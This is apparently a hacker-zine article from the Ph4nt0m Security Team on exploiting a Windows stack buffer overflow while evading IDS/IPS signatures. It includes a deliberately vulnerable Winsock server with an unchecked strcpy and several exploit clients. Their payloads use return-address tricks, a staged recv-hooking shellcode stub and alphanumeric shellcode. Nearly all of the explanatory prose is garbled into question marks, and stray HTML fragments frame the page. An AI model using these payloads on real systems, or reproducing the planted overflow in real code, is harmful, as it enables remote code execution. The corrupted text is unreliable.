|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |
==Ph4nt0m Security Team==
Issue 0x01, Phile #0x03 of 0x06
|=---------------------------------------------------------------------------=|
|=---------------------=[ ????????????? ]=---------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[ By F.Zh ]=--------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
[??????????????????????????????飬?????????????????????????]
?и??????????????????????????????????????о????????????????????
?????????????????????????С???????????????????????棬??????????????
????????????С????????????????????????????????????????????????
???????????????????????????????????????У????3????о?????????????
??????????????????????μ??????????????????????????£?????????????
??????δ????????????
??????????????????????????????????????????????????????????
???????·??????????????ɡ???????????????б??????????????????????????
????????windows?????????????????????????????exploit???????????????
???????????????????????????????????????Sowhat???
(http://hi.baidu.com/secway/blog/item/cb121863a6af72640c33facf.html)???????????
????Google??????????????????????????????????????????????????????
??????nop??????????????????????????????????????????????????????????
??????????????????????????????????????????nop???????????μ???????????
???????????????????????????????????????????????????????????
???????????????????????????ida??????£??????????????????С????
========================??г??????=================================
#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void msg_display(char * buf)
{
char msg[200];
strcpy(msg,buf);// overflow here, copy 0x200 to 200
cout<<"********************"<<endl;
cout<<"received:"<<endl;
cout<<msg<<endl;
}
void main()
{
int sock,msgsock,lenth,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200]; //noticed it is 0x200
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
cout<<sock<<"socket creating error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server)))
{
cout<<"binding stream socket error!"<<endl;
}
cout<<"**************************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**************************************"<<endl;
listen(sock,4);
lenth=sizeof(struct sockaddr);
do{
msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
if(msgsock==-1)
{
cout<<"accept error!"<<endl;
break;
}
else
do
{
memset(buf,0,sizeof(buf));
if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
{
cout<<"reading stream message erro!"<<endl;
receive_len=0;
}
msg_display(buf);//trigged the overflow
}while(receive_len);
closesocket(msgsock);
}while(1);
WSACleanup();
}
========================??г??????=================================
???????????????????0x200???????200????????濽?????????????????????
??????????????????????widechar???????????????????????????????????????
????????1????Ψ????л赽??16?????10?????????????????????д???????????
?????ɡ??????????????????????????????ret?????code page??????jmp esp???
??????????????????exp???????????????п????????????????????????
?????????????????е???????????????????????衣
?e???????????????????????????????????????????????????????
??Ρ?
????????CPU??????????
dark spyrit?????Phrack?????????????????????????????dll????????????
???????????????????????????????????????????????ret?????esp???
?????????????????????jmp esp????????????У????????дshellcode???????
???????????????????????????????????????á?dark spyrit???????????????
???????????????????????????С?????????????????????????????????
?????????????????????й????????????????????????????????jmp esp???????
?????????????????????汾?????/3gb??????????????????????????????
???????С???????????????????????????????????????????????????????
???????????????????????
???????????????????????????????????????????????????????????
??????????????????????????????????????????????????????Щ???????????
???????????????????????????????????????????????????м??????????????
?????????????????????????????????????????????????????Щ??????????
shellcode????????????Щids/ips????????????????????????????????
??????????????????????
<--lower upper-->
================================================================
var of vulnerable function | ret | var of upper function ...
================================================================
NOP NOP NOP NOP NOP NOP NOP |jmp esp| shellcode
================================================================
shellcode |jmp ? | var of upper function
================================================================
??????????????巽??????????????ret????????????????2?????(eb xx???????)??
????Щids/ips??signature??д??????????xxoo????????????????????д?ò???
??signature???????????????????ret??????????Щ?????????????????ret
?????????????????????????????????????巽??????????????????????е?????
?鷽??????????????????????????????????ret????????????????????????
???Щ?????????????????
???????????岥??????飬?????·?й???????.ani?????exp???????????
???????λ??exp????????????????????????????????????С????????????????
???????????ids????????????????????????????á?????????????????????
??????????????????????????
????msg_display???????????????????????????????????????????????ret
????????????????????????ret???????CPU?????msg_display???????esp??????
?????????????????????????jmp [esp]????????????????????????????
????????????????????????????????????0xc3(ret)?????????????????????
??????
<--lower upper-->
=============================================================================
var of vulnerable function | ret | ptr | other var of upper function ...
=============================================================================
^---------------------------------------|
????е?ret??????????0xC3????A?????????msg_display??????????????A?????
??????????0xC3(ret)???eip???????????????????
????????????????????exploiting????????ptr??ret???е???????????
??pop???Σ??????????????seh?????÷???????????????????ɡ?
???????0xC3??????????????????????????????????????????ret?????
?????????????msvcrt.dll?????sp???????????????????code page???????
?????汾?????????????????????????????Щ????????????????Щ?????
??????????????Ч????????????Щ????????????????????????淶????????
?????????????????????????
????輶?????????????????ε??????????????????е?????????????????
?????????????????????????淶??????0x7ffa1571????????pop pop ret???
?????????0x7ffa1571???????0x7ffa156e????????pop pop ret????????????
???????????????????й???????realplayer import????????pop pop ret???????
?????淶???Χ?????????????????????? call xxx/ret xx????????call xxx????
???ó????????
???????С?????????????4???????????????????????ɡ?x86??DWORD???λ
??????????????????????????????ret??????λ????????ret??????????pe
????У?????00401258??????????????????????????Χ??00401201~004012ff?????
????2???????????????Χ??00400101~0040ffff?????????Χ????????????????
?????????????????????pe????汾?????????????????????????仯????????
???????и???????????λ??????????????????????????????????????????
???????????????memcpy???μ??????????????????Ч??strcpy???鷳Щ????????????
????????????????????????????????????????
========================??г??????=================================
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
if((he = gethostbyname(ip)) == 0)
return INVALID_SOCKET;
host.sin_port = htons(port);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = WSASocket(2, 1, 0, 0, 0, 0)) == -1)
return INVALID_SOCKET;
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
closesocket(s);
return INVALID_SOCKET;
}
return s;
}
void main()
{
char malicious[] = "\xcc"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"OA@";
WSADATA wsaData;
if(WSAStartup(0x0101,&wsaData) != 0)
return;
SOCKET s = ConnectTo("127.0.0.1", 7777);
send(s, malicious, 203, 0); //hard encoded :)
WSACleanup();
}
========================??г??????=================================
????????????int3??
????exp???????????????????shellcode????????????????????????????
??????????shellcode???á??????????????μ??????????????????е?????
??????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????
???е?????飬??????????????????exp????????????????????????????????
??????????????????????????????????????????????????exp?????????
??????????????????棬????????????????????????????顣
?????????????????????????????????????????????jmp esp???
????????????????????????????????????????????????????????????????
???e????????????????????????????????????????????????????????
???????????????????????????????????????????????????????÷??????????
???????ɡ????????????????daemon?????????????????????????????????????
?????????????????
========================??г??????=================================
char malicious[] =
"\xCC"
"LLLL`a"
"\x50\x44\x44\x68\x55\x55\x55\x12\x44\x44\xc3"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"OA@";
========================??г??????=================================
????????????????0xCC????????????0x90???????????£???????????????
???????????????telnet 7777?????????й????????з??????????????????????
???????????С????????????????????????????????`??a?????pushad??popad????????
???м????????κι????shellcode???????????????
?????????????????????????????????????????????????????????????
???????????????????????????????????????У??????????????????????
?????????????????·????軹???????????????????????????????????????
??????????????????????????????????????????????????????????????
??????????????????????????ó????????????ζ?????????????????????
shellcode??????????????shellcode????檔
???????????????????????????????????????
???????????????????SOCKET????????????е??????????????????????
SOCKET??????????????????п????????????????????????????????hook
recv????????????????????????SOCKET???????Щ?????????????÷????????????
???????????????????????????????????????????????????????????????
?????????????????о????????????????socket??????????????????????
???????棬???????????????????????recv??????????б???ú????????
?????????????PE????????????ɡ???????????????????????????????????
?????????????
========================??г??????=================================
void main()
{
char malicious[] = "\x90"
"LLLL`"
"\x33\xd2\x66\xba\x10\x10\x2b\xe2\x33\xf6\x56\x52\x54\x53\x66\xb8"
"\xe4\x90\xff\x10\x83\xec\x08\xff\xd4\x5d\x5d\x33\xd2\x66\xba\x10"
"\x10\x03\xe2"
"a"
"\x50\x44\x44\x68\x55\x55\x55\x12\x44\x44\xc3"
""
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"OA@";
WSADATA wsaData;
if(WSAStartup(0x0101,&wsaData) != 0)
return;
SOCKET s = ConnectTo("127.0.0.1", 7777);
send(s, malicious, 203, 0);
send(s, "\xCC\xC3",2,0);
Sleep(-1);
WSACleanup();
}
========================??г??????=================================
????????????????SOCKET????ε???recv???????shellcode????У????????濴
????"\xCC\xC3"???????д??????shellcode???????????????????????????????
?????0xc3??β???????????????????????recv???????send??????shellcode??????
??????????send?????????????????????????????
????????μ????????Щ???????????????IIS 5???????????RPC?????????
?????????????hook?????????α????????????????in??out??opnum?????????baidu
????????????????????????????????????????????????????????????ORACLE???
???????shutdown????????????????????????????????????÷??????????IIS6??
???????????????м?????????shellcode??д??????????????Щ???裬???????
?ɡ??????????????в??????????????????????????????????????????????????
?????????
????????shellcode???????????????????????????????????????????????
??a????????????????????????????????????????????????????????????
????????????????????????exp????????£???????????????????????????п??
?????????t?????????????????exp?????????????telnet???????????shell???
??????????????????????ж?????ж????????????????????????е????
????????????sample??
void main()
{
char malicious[] = "`aZZZZZZZZZZZZZZZZZZTYXXXXfiAqcYfPAAeiAoHFXZPiAkj"
"brIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVYDahPiARC"
"pDXPQlaatHWsaLtUAAAACFiaaPoHHmDahivabowabxANlKjPpp"
"ppPfqVfkzppQpBknrFJPPeruDecoOaeNtiPdPpPxSnLpHOoMd"
"AAAOA@";
WSADATA wsaData;
if(WSAStartup(0x0101,&wsaData) != 0)
return;
SOCKET s = ConnectTo("127.0.0.1", 7777);
send(s, malicious, 203, 0);
send(s, "\xCC\xC3",2,0);
Sleep(-1);
WSACleanup();
}
????????shellcode???????????????????????????malicious???????????????
????????????????????迴???μ?????????л??????????????????????£?
?????????????д???shellcode??????????????????shellcode???????????
?????????????Щpatch??patch???????????????????????н??????????????
?С?
???code???????????????????0xCC???????????send????????ret??????????
??????
????????????exp????????????????????????????????ú???????????????
??????????????????????????????????λ????????????????????д????????
???????????????????SOCKET??????shellcode?????????????裬??ò??????
?????飬????????????????????malicious?????????????????????????????
????????????????棬??????????????д???shellcode???????????????????
???
???????????????????????????????????telnet??????shell????exp????????
telnet?????????????????????????????????203???????μ????????????
????????????????????????????????????С????ɡ?
-EOF-
|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |